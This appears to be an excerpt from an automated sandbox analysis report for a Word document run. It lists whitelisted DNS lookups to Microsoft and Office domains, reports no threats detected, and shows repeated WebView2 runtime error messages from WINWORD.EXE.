MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.45.176.171
  • 23.45.176.169
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.2
  • 20.190.159.23
  • 20.190.159.0
  • 40.126.31.67
  • 40.126.31.69
whitelisted
www.microsoft.com
  • 2.21.17.194
whitelisted
go.microsoft.com
  • 104.68.83.150
  • 104.90.26.39
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
roaming.officeapps.live.com
  • 52.109.76.243
whitelisted
omex.cdn.office.net
  • 23.62.212.81
  • 23.62.212.94
whitelisted
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.